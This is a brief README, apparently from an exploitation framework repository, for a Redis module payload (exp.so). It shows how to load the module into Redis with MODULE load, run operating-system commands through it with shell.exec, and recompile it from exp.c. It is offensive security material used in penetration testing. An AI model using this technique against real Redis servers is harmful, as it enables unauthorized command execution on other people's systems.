Files
metasploit-gs/data/exploits/redis/exp/readme.md
T
2019-07-20 00:17:57 +08:00

24 lines
317 B
Markdown

## Intro
This is a compiled shared object file of redis module.
## Load redis extension
```
MODULE load ./exp.so
```
## Run command
```
redis-cli
127.0.0.1:6379> shell.exec "whoami"
```
## Compile
You can modify the exp.c source code if you want.
And the compile it to exp.so in current directory.
```
make
```